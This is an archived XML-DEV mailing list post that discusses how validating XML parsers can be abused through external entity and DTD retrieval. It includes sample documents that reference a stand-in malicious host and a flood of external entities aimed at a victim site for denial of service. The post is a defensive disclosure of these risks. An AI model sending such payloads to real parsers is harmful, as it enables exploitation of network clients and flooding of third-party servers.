[XML-DEV Mailing List Archive Home] [By Thread] [By Date] [Recent Entries] [Reply To This Message] Malicious documents? (WAS: Interesting mailing list & a rare broadside)
James Clark wrote, > Suppose an application is trying to use validation to protect itself > from bad input. It carefully loads the schema cache with the > namespaces it knows about, and calls validate(). Now the bad guy > comes along and uses a root element from some other namespace and > uses xsi:schemaLocation to point to his own schema that that has a > declaration for that element and uses <xs:any namespace="##any" > processContents="skip"/>. Won't they just have almost completely > undermined any protection that was supposed to come from validation? This is at least partly related to something that's been worrying me on and off for quite a while now. It seems like a fairly obvious worry, but I don't recall seeing any explicit discussion of it here (or anywhere else for that matter). Many (most?) off the shelf XML parsers, at least when validating, will by default attempt to retrieve external subsets and other entities via their system ids. This implies that an arbitrary XML document instance, whether from a trusted or untrusted source, can cause an XML processor to make network connections to any host on any port using any protocol for which retrieval is supported by the network client associated with the XML processor. This opens up at least two, possibly more, kinds of attack, * Exploiting vulnerabilities in network clients. A malicious host might submit the following kind of document instance to an XML processor, <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://www.malicious-host.com/evil-uri"> <foo/> The server at www.malicious-host.com could return a response carefully crafted to exploit weaknesses in the victim XML processors network client. * Using XML processors for denial of service attacks. Consider the following document instance, <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY hit-1 SYSTEM "http://www.victim.org/victim-uri1> <!ENTITY hit-2 SYSTEM "http://www.victim.org/victim-uri2> <!-- repeat ad nauseam ... --> <!ENTITY hit-n-1 SYSTEM "http://www.victim.org/victim-uri-n-1> <!ENTITY hit-n SYSTEM "http://www.victim.org/victim-uri-n> ]> <foo> &hit-1; &hit-2; <!-- repeat ad nauseam ... --> &hit-n-1; &hit-n; </foo> When presented with such a document an unwitting XML processor might proceed to clobber www.victim.org. If anyone can come up with variations on this theme I'd be extremely interested to hear about them. There are, I think, a couple of conclusions to draw from the examples above. First, that validating untrusted documents, rather than protecting receiving applications, might actually be quite a dangerous activity. Second, that in some contexts XML document instances might be better thought of as being closer to active content than to text/plain thanks to the implicit retrieval semantics of references to external entities. Neither of these conclusions are particularly surprising, and in some respects they've been discussed here before under the heading of XML application robustness. For example, a related case would be the runtime configuration file, <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://www.unwise.com/config.dtd"> <foo/> for an application which insists on validating its configuration on startup, but doesn't maintain a locally cached copy of the DTD: after the 10000th sale the server at www.unwise.com collapses under the strain of 10,000 requests for config.dtd at 9am in the morning leading to all installations of the application failing. There's also a privacy issue here: the DTD retrieval could be construed as the application "phoning home". Thoughts? Cheers, Miles
|
PURCHASE STYLUS STUDIO ONLINE TODAY!Purchasing Stylus Studio from our online shop is Easy, Secure and Value Priced! Download The World's Best XML IDE!Accelerate XML development with our award-winning XML IDE - Download a free trial today! Subscribe in XML format
|